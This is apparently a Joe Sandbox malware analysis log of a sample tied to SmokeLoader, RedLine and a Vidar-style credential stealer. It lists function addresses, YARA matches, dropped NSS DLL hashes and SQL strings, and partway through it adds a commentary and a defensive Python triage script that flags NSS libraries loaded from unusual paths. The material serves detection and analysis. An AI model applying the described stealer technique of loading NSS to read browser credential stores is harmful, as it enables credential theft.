Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0A64D0 12_2_6D0A64D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0FA4D0 12_2_6D0FA4D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0E0700 12_2_6D0E0700
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D08A7D0 12_2_6D08A7D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0BC650 12_2_6D0BC650
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0846D0 12_2_6D0846D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0BE6E0 12_2_6D0BE6E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0FE6E0 12_2_6D0FE6E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D144130 12_2_6D144130
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0D6130 12_2_6D0D6130
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0C8140 12_2_6D0C8140
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0601E0 12_2_6D0601E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D128010 12_2_6D128010
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D12C000 12_2_6D12C000
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0AE070 12_2_6D0AE070
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D058090 12_2_6D058090
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D13C0B0 12_2_6D13C0B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0700B0 12_2_6D0700B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0D2320 12_2_6D0D2320
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D068340 12_2_6D068340
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1A2370 12_2_6D1A2370
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D062370 12_2_6D062370
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D17C360 12_2_6D17C360
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0F6370 12_2_6D0F6370
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0923A0 12_2_6D0923A0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0BE3B0 12_2_6D0BE3B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0B43E0 12_2_6D0B43E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D12A210 12_2_6D12A210
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D138220 12_2_6D138220
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0F8250 12_2_6D0F8250
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0E8260 12_2_6D0E8260
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D12E2B0 12_2_6D12E2B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1322A0 12_2_6D1322A0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1E62C0 12_2_6D1E62C0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0C3D00 12_2_6D0C3D00
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D053D80 12_2_6D053D80
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1A9D90 12_2_6D1A9D90
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D131DC0 12_2_6D131DC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D071C30 12_2_6D071C30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D063C40 12_2_6D063C40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D189C40 12_2_6D189C40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0FFC80 12_2_6D0FFC80
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D19DCD0 12_2_6D19DCD0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D121CE0 12_2_6D121CE0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D095F20 12_2_6D095F20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D055F30 12_2_6D055F30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1B7F20 12_2_6D1B7F20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D081F90 12_2_6D081F90
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D17DFC0 12_2_6D17DFC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1E3FC0 12_2_6D1E3FC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D10BFF0 12_2_6D10BFF0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D16DE10 12_2_6D16DE10
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1BBE70 12_2_6D1BBE70
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1E5E60 12_2_6D1E5E60
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D083EC0 12_2_6D083EC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1AF900 12_2_6D1AF900
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D115920 12_2_6D115920
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0DF960 12_2_6D0DF960
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D11D960 12_2_6D11D960
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D131990 12_2_6D131990
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D071980 12_2_6D071980
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0F99C0 12_2_6D0F99C0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0999D0 12_2_6D0999D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0C59F0 12_2_6D0C59F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0F79F0 12_2_6D0F79F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0BD810 12_2_6D0BD810
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0FF8C0 12_2_6D0FF8C0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D13F8F0 12_2_6D13F8F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D06D8E0 12_2_6D06D8E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0938E0 12_2_6D0938E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1BB8F0 12_2_6D1BB8F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0ABB20 12_2_6D0ABB20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D13FB60 12_2_6D13FB60
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D145B90 12_2_6D145B90
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D051B80 12_2_6D051B80
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D129BB0 12_2_6D129BB0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0B9BA0 12_2_6D0B9BA0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0A7BF0 12_2_6D0A7BF0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D101A10 12_2_6D101A10
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D09FA10 12_2_6D09FA10
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D15DA30 12_2_6D15DA30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1E9A50 12_2_6D1E9A50
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D13DAB0 12_2_6D13DAB0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D061AE0 12_2_6D061AE0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1AF510 12_2_6D1AF510
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0C7500 12_2_6D0C7500
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D075510 12_2_6D075510
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D099590 12_2_6D099590
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0E55F0 12_2_6D0E55F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0ED410 12_2_6D0ED410
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D149430 12_2_6D149430
Source: Joe Sandbox View Dropped File: C:\ProgramData\FBGIDHCAAKEB\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\FBGIDHCAAKEB\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
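The two dropped files above are unmodified Mozilla NSS/NSPR components (freebl3.dll and mozglue.dll; nss3.dll and softokn3.dll show up further down as `nss3[1].dll` and `softokn3[1].dll`, WinINet cache names that mark them as downloaded at run time by katDDA4.tmp). A stealer needs this library set to open Firefox's key4.db outside the browser. Because the binaries are vendor builds, hash allowlisting sees nothing wrong; the signal is where they are loaded from and by which process. The following triage function is an added example (mine, not Joe Sandbox's or the stealer's code) over constructed image-load records: the two FBGIDHCAAKEB entries use the paths and SHA-256 values this report lists, the firefox.exe and explorer.exe entries are made-up benign controls, and the "12 uppercase letters under ProgramData" pattern is a heuristic derived from the directory name FBGIDHCAAKEB, not a documented Vidar constant.

```python
"""Flag Mozilla NSS DLLs mapped from outside their vendor location (added example).

The image-load records are constructed: the FBGIDHCAAKEB entries carry the
paths and SHA-256 values this report lists for the dropped files, the
firefox.exe and explorer.exe entries are benign controls with made-up hashes.
"""
import ntpath
import re
from typing import Dict, List, NamedTuple


class ImageLoad(NamedTuple):
    process: str  # full path of the process that mapped the DLL
    module: str   # full path of the DLL
    sha256: str   # lowercase hex digest of the DLL on disk


# NSS/NSPR components a stealer needs to use Firefox's key4.db off-browser.
NSS_MODULES = {"nss3.dll", "freebl3.dll", "softokn3.dll", "mozglue.dll"}

# SHA-256 of the two dropped copies as listed in this report (vendor builds, not patched).
REPORTED_DROPS: Dict[str, str] = {
    "freebl3.dll": "edd043f2005dbd5902fc421eabb9472a7266950c5cbaca34e2d590b17d12f5fa",
    "mozglue.dll": "ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a",
}

VENDOR_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\")
# Sandbox user profile; production code resolves %TEMP% per user instead.
USER_TEMP = "c:\\users\\user\\appdata\\local\\temp\\"
# Heuristic only, derived from this sample's working directory FBGIDHCAAKEB.
RANDOM_PROGRAMDATA = re.compile(r"^c:\\programdata\\[a-z]{12}$", re.I)

LOADS: List[ImageLoad] = [
    ImageLoad(r"C:\Users\user\AppData\Local\Temp\katDDA4.tmp",
              r"C:\ProgramData\FBGIDHCAAKEB\freebl3.dll", REPORTED_DROPS["freebl3.dll"]),
    ImageLoad(r"C:\Users\user\AppData\Local\Temp\katDDA4.tmp",
              r"C:\ProgramData\FBGIDHCAAKEB\mozglue.dll", REPORTED_DROPS["mozglue.dll"]),
    # Constructed controls: a real browser and a system process loading from vendor paths.
    ImageLoad(r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r"C:\Program Files\Mozilla Firefox\nss3.dll", "0" * 64),
    ImageLoad(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\vcruntime140.dll", "0" * 64),
]


def triage(loads: List[ImageLoad]) -> List[dict]:
    """Return one finding per NSS module load that looks like an off-browser deployment."""
    findings: List[dict] = []
    for ev in loads:
        name = ntpath.basename(ev.module).lower()
        if name not in NSS_MODULES:
            continue
        mdir = ntpath.dirname(ev.module).lower()
        pdir = ntpath.dirname(ev.process).lower() + "\\"
        reasons: List[str] = []
        # NSS ships with Firefox/Thunderbird under Program Files; anywhere else is a copy.
        if not mdir.startswith(VENDOR_ROOTS):
            reasons.append("nss_module_outside_program_files")
        # Vidar-style random working directory under ProgramData (heuristic).
        if RANDOM_PROGRAMDATA.match(mdir):
            reasons.append("random_programdata_dir")
        # The loader itself runs from the user's Temp directory.
        if pdir.startswith(USER_TEMP):
            reasons.append("loader_in_user_temp")
        # Same bytes as the drop in this report: a clean vendor hash, which is why
        # hash allowlisting alone would have passed it.
        if REPORTED_DROPS.get(name) == ev.sha256.lower():
            reasons.append("hash_seen_in_this_report")
        if reasons:
            findings.append({"process": ev.process, "module": ev.module, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in triage(LOADS):
        print(hit["process"], "->", hit["module"], ", ".join(hit["reasons"]))
```

Run over image-load telemetry (Sysmon Event ID 7 or equivalent) the same rule fires on any process that is not the browser mapping these four DLLs from a user-writable path; the `hash_seen_in_this_report` reason is informational and exists to make the point that the hash is clean.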
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: String function: 6D1ED930 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: String function: 6D199F30 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: String function: 6D1EDAE0 appears 75 times
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: String function: 6D083620 appears 93 times
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: String function: 6D1E09D0 appears 317 times
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: String function: 6D089B10 appears 103 times
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: String function: 004087A0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: String function: 0040F5A0 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: String function: 02128A07 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: String function: 0212F807 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\5876.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7992 -s 468
Source: xvJv1BpknZ.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.1650874294.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.1651023063.0000000002203000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/36@11/10
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0C0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 12_2_6D0C0300
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_0215614A CreateToolhelp32Snapshot,Module32First, 0_2_0215614A
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0042B20E CoCreateInstance, 7_2_0042B20E
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\etrtabd
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7992
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5876.tmp
Source: xvJv1BpknZ.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: softokn3[1].dll.12.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.12.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.12.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.12.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.12.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.12.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.12.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: katDDA4.tmp, katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
